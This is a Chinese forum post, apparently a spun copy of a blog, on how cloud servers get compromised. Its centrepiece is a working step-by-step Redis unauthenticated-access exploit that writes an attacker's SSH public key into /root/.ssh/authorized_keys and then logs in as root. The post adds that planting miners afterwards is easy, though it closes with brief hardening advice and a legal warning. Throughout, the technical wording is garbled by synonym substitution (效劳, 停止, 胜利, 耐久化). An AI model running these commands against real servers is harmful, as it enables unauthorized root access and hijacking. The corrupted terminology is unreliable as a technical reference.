伙伴云客服论坛»论坛 S区 S零代码 查看内容

0 评论

0 收藏

分享

你晓得小伙伴们的阿里云效劳为什么会被ru侵,是怎么ru侵的吗?

目录
一、什么是DDOS攻击
二、自己购置的Linux效劳器是怎么被wa矿的
三、你晓得SSH的原理吗
四、SSH免密登录远程Linux云主机流程解析
五、SSH免密登录远程Linux云主机实战
六、SSH免密登录远程Linux云主机实战
七、 阿里云ECS效劳器装置Redis6-ru侵环境
八、如何防止云效劳器被ru侵提权
导读:本博文简单介绍了下DDOS攻击,重点介绍了SSH免密登录流程原理,和后续小伙伴们在装置Redis以及对外网的效劳注意事项。注意:仅做学习使用哇
《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违犯国家规定,侵入国家事务、国防建立、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。
一、什么是DDOS攻击

分布式回绝效劳攻击(Distributed Denial of Service,简称DDoS)是指处于不同位置的多个攻击者同时向个或数个目的发动攻击,或者一个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时施行攻击。由于攻击的发出点是分布在不同地方的,这类攻击称为分布式回绝效劳攻击,其中的攻击者可以有多个。
表现形式:
一种为流量攻击,主要是针对网络带宽的攻击,即大量攻击包导致网络带宽被阻塞,合法网络包被虚假的攻击包吞没而无法到达主机
一种为资源耗尽攻击,主要是针对效劳器主机的攻击,即通过大量攻击包导致主机的内存被耗尽或CPU被内核及应用程序占完而形成无法提供网络效劳
(1)被攻击主机上有大量等待的TCP连接。
(2)网络中充溢着大量的无用的数据包,源地址为假。
(3)制造高流量无用数据,形成网络拥塞,使受害主机无法正常和外界通讯。
(4)利用受害主机提供的效劳或传输协议上的缺陷,反复高速地发出特定的效劳恳求,使受害主机无法及时处置所有正常恳求。
(5)严重时会形成系统死机
二、自己购置的Linux效劳器是怎么被wa矿的

背景:
   近两年很多人购置了云效劳器,阿里云、华为云、腾讯云等
   呈现了情况是经常云效劳器有不明进程,cpu使用率90%以上
   部署云效劳器的被清空-支付BTB才可以复原
你晓得小伙伴们的阿里云效劳为什么会被ru侵,是怎么ru侵的吗?-1.jpg


N种方式:
   弱口令爆破入侵
   webshell文件提权入侵
   redis端口入侵【最多】
最多的现象:
   不明进程的CPU占有率过高
   强迫停止,过一会又自动呈现
处置办法:
   关闭对外监听的端口
   查找linux定时任务->肃清位置任务
   redis制止远程访问 或者 设置复杂密码、不用默认的6379端口
   恢复出厂设置

那这个入侵原理是怎样的?
需要知识: 对称和非对称加密知识、中间人攻击知识、ssh登录流程知识

三、你晓得SSH的原理吗

SSH流程解析:
    使用了RSA非对称加密算法
   (1)远程主机收到用户的登录恳求,把自己的公钥发给用户。
   (2)用户使用这个公钥,将登录密码加密后,发送回来。
   (3)远程主机用自己的私钥,解密登录密码,假设密码正确,就同意用户登录
备注:假设攻击者插在用户与远程主机之间(比如在公共的wifi区域),用伪造的公钥,获取用户的登录密码, 再用这个密码登录远程主机,那么SSH的安全机制就荡然无存了,这种风险就是著名的"中间人攻击"
第一次登录对方主机,系统会呈现下面的提示
你晓得小伙伴们的阿里云效劳为什么会被ru侵,是怎么ru侵的吗?-2.jpg


  “公钥指纹”,是指公钥长度较长(这里采用RSA算法,长达1024位),很难比对,所以对其停止MD5计算,将它变成一个128位的指纹。
   上例中是98:2e:d7:e0:de:9f:ac:67:28:c2:42:2d:37:16:58:4d
   用户自己衡量以后决定接受这个远程主机的公钥(远程主机贴出公钥指纹,以便用户自行核对)
   接受之后,就可以输入密码,胜利后就可以登录, 当远程主机的公钥被接受以后,它就会被保管在文$HOME/.ssh/known_hosts之中。
   下次再连接这台主机,系统就会认出它的公钥已经保管在本地了,从而跳过警告部分,直接提示输入密码
四、SSH免密登录远程Linux云主机流程解析

使用密码登录,每次都必需输入密码,非常费事, SSH还提供了公钥登录,可以省去输入密码的步骤
* 流程
   * 所谓“公钥登录”,原理就是用户将自己的公钥贮存在远程主机上
   * 登录的时候,远程主时机向用户发送一段随机字符串,用户用自己的私钥加密后,再发回来。
   * 远程主机用事先贮存的公钥停止解密,假设胜利,就证明用户是可信的,直接允许登录shell,不再要求密码
   * 要求用户必需提供自己的公钥。假设没有现成的,可以直接用下面的命令生成一个 ssh-keygen
最多的应⽤案例: Git 代码仓库管理通信
五、SSH免密登录远程Linux云主机实战

什么是known_hosts文件
        A通过ssh首次连接到B,B会将公钥1(host key)传送给A,A将公钥1存入known_hosts文件中
        即SSH会把你每个你访问过计算机的公钥(public key)都记录在~/.ssh/known_hosts。
        当下次访问相同计算机时,OpenSSH会核对公钥。假设公钥不同,OpenSSH会发出警告 防止受到DNS Hijack之类的攻击
host文件内容格式:ip 公钥串
你晓得小伙伴们的阿里云效劳为什么会被ru侵,是怎么ru侵的吗?-3.jpg


当修改这个公钥串后,A通过ssh登陆B时提示  : Host key verification failed
原因:A的known_hosts文件中记录的B的公钥1 与 连接时B传过来的公钥2不匹配
   处置办法:
      方式一:删除A的known_hosts文件中记录的B的公钥
      方式二:清空本地host主机配置  echo "" > ~/.ssh/known_hosts
      方式三:修改配置文件,在ssh登陆时不通过known_hosts文件停止验证(安全性有所降低)需重启机器
六、SSH免密登录远程Linux云主机实战

本地生成秘钥串:
        ssh-keygen
        运行完毕以后,在$HOME/.ssh/目录下,会重生成两个文件
        id_rsa.pub 和 id_rsa, 前者是你的公钥,后者是你的私钥
        将公钥传送到远程主机host上面,再登录,就不需要输入密码了
远端效劳器:
      远程主机将用户的公钥,保管在登录后的用户主目录的$HOME/.ssh/authorized_keys文件中
      公钥就是一段字符串,只要把它追加在authorized_keys文件的末尾就行了
这些就是入侵的原理。核心:就是把公钥保管到 $HOME/.ssh/authorized_keys目录


  七、 阿里云ECS效劳器装置Redis6-ru侵环境


两台效劳器装置Redis6
  然后开启远程连接 bind 0.0.0.0
  不设置密码,或者简单默认123456

守护进程运行 daemonize yes
  指定配置文件启动  ./redis-server ../redis.conf

----------------------开端---------------------------------------
1、ssh-keygen生成一对秘钥
ssh-keygen

你晓得小伙伴们的阿里云效劳为什么会被ru侵,是怎么ru侵的吗?-4.jpg


2、公钥生成攻击键值, 生成后查看下 cat test.txt
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > test.txt

你晓得小伙伴们的阿里云效劳为什么会被ru侵,是怎么ru侵的吗?-5.jpg


3、配置Key到Redis中
./src/redis-cli -h 192.168.243.129  连接远端要ru侵的Redis
cat test.txt |redis-cli -h 192.168.243.129 -x set bar 。查看公钥内容,将内容通过管道命令写到bar这个key中

4、登录Redis停止检查,是否已经写入进Redis中
redis-cli -h 192.168.243.129

get bar
5、通过Redis保管机制交换系统文件
./src/redis.cli -h 192.168.243.129
config set dir /root/.ssh
config get dir
config set dbfilename "authorized_keys"
save
exit

6、胜利的将自己的公钥写入 /root/.ssh 文件夹的 authotrized_keys
7、登录远程主机看下效果 ssh -i id_rsa root@192.168.243.129
8、免密正常登陆192.168.243.129效劳器
ru 侵流程,利用redis的耐久化操作文件权限
   * Redis Config Set 命令可以动态地调整 Redis 效劳器的配置(configuration)而无须重启。
   * Redis Save 命令执行一个同步保管操作,将当前 Redis 实例的所有数据快照(snapshot)以 RDB 文件的形式保管到硬盘。
   * Redis支持RDB和AOF两种耐久化机制
   * RDB耐久化是把当前进程数据生成快照保管到硬盘的过程,触发RDB耐久化过程分为手动触发和自动触发
     * redis耐久化配置,RDB文件保管在dir配置指定的目录下,文件名通过dbfilename配置指定
     * 通过执行config set dir {newDir} 和 config set dbfilename {newFileName}运行期动态执行
     * 当下次运行时RDB文件会保管到新目录
到这ru侵介绍就完毕啦,可以直接登录对方的效劳器,想植入定时任务 wa矿程序,肉鸡攻击等 也就水到渠成了。。。
不过 重点:
《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违犯国家规定,侵入国家事务、国防建立、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。
八、如何防止云效劳器被ru侵提权

   1..制止一些高危命令
    2.以低权限运行应用效劳
    3.为效劳 添加复杂密码验证
    4.制止外网访问,配置防火墙
    5.保证 authorized_keys 文件的安全(只读,防添加新公钥等)

回复

举报 使用道具

全部回复
暂无回帖,快来参与回复吧
本版积分规则 高级模式
B Color Image Link Quote Code Smilies

冷无情
注册会员
主题 12
回复 25
粉丝 0
|网站地图
快速回复 返回顶部 返回列表